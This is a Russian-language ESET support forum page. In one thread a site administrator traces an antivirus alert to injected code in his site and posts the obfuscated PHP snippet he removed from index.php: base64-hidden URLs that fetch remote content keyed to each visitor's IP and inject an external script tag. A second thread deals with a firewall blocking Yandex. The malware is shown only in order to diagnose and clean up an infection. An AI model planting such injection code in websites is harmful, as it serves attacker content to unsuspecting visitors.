Антивирус блокирует , главная

1 2 3 4 5 ... 12 След.
RSS
Доброго времени суток.
С недавнего времени начал админить одну фирму, и один из их сайтов блокируется нодом.
http://www.elk-spb.ru
Слил через ftp сайт, проверил НОДом, в двух файлах были сомнительные ссылки в ява-скрипте. Вычистил.
Проверил ещё раз, сканируя на локальном диске у себя - нормально, не ругается. Залил обратно.
Результат: сайт чист, но НОД ругается на сайт, а остальные антивирусы - нет. Вирустотал говорит "сайт из клин"

https://www.virustotal.com/ru/url/e36684d3fb17e0219b3d5c2b23c6b8d86ab31d3dfb51381cd­d7282b1aad19263/analysis/1396260082/

Самое обидное, что непонятно, что ему не нравится. В логах "архив". Что это значит?
Вот пример записи из лога:
"31.03.2014 15:12:34 Фильтр HTTP архив http://www.elk-spb.ru HTML/ScrInject.B.Gen вирус соединение прервано - изолирован ERROM-WORK\user Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Mozilla Firefox\firefox.exe."

В свойствах записи следующее:

"http://www.elk-spb.ru HTML/ScrInject.B.Gen вирус соединение прервано - изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Mozilla Firefox\firefox.exe.
http://www.elk-spb.ru = GZ = file.htm HTML/ScrInject.B.Gen вирус "

Подскажите, пожалуйста, куда копать.
Возможно это

Цитата
<script src="h_ttp://accountus.gets-it.net/googlestat.php"></script>
Изменено: zloyDi - 27.01.2018 08:45:22
Да. Точно. Проблему вызывал вот этот кусок в index.php

Код
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==");
      else 
         echo $content;

      }
}
collectnewss ();



Поскольку я php знаю ровно настолько, чтоб отличить его от других языков, не сразу разобрался.

Спасибо за помощь.

Кстати, ещё раз хочется отметить то, что это детектит только НОД.
Ну вот и ладненько. Тему закрываю.
Доброго времени суток всем участникам форума.
Буквально месяц назад появилась следующая проблемка.
В качестве браузера по умолчанию стоит Mozilla Firefox, месяц назад браузер перестал открывать страницу Яндекс. Путем отключения модулей защиты в ESET 7 определил, что после отключения "персонального файервола" браузер загружает страницу яедкс-а без проблем. После данной процедуры с отключением и включением файервола страница яндекса открывается до перезагрузки ПК, после перезагрузки проблема проявляется снова.
То же самое и с браузером IE.
Прошу подсказать в чем проблема если кто-то с этим уже сталкивался.
В каком режиме стоит файервол? Проблема во всех браузерах? Включена ли проверка HTTPS?
Файервол стоит в интерактивном режиме. Проблема проверена на двух браузерах Mozilla Firefox и IE.
По проверки HTTPS, если не сложно подскажи где в настройках можно посмотреть, видимо где-то пропускаю.
Николай, зайдите в дополнительные настройки (F5) - Сеть - Персональный файервол - в разделе  "Дополнительные настройки и IDS" -> "Решение проблем" выставить галочку "Регистрировать все заблокированные соединения", перезагрузите ПК, попробуйте зайти на сайт , в основном окне выберите Служебные программы -> Файлы журнала -> Персональный файервол -> В контекстном меню выберите"Экспорт", выберите файл для сохранения журнала и пришлите его нам.

По HTTPS - раздел Интернет и электронная почта - Защита доступа в Интернет - HTTP, HTTPS.
ESET Technical Support
Куда оправить журнал событий?
Изменено: Николай Николай - 27.01.2018 08:34:49
Николай, прикрепите его здесь, на форуме.
ESET Technical Support
1 2 3 4 5 ... 12 След.
Читают тему (гостей: 1)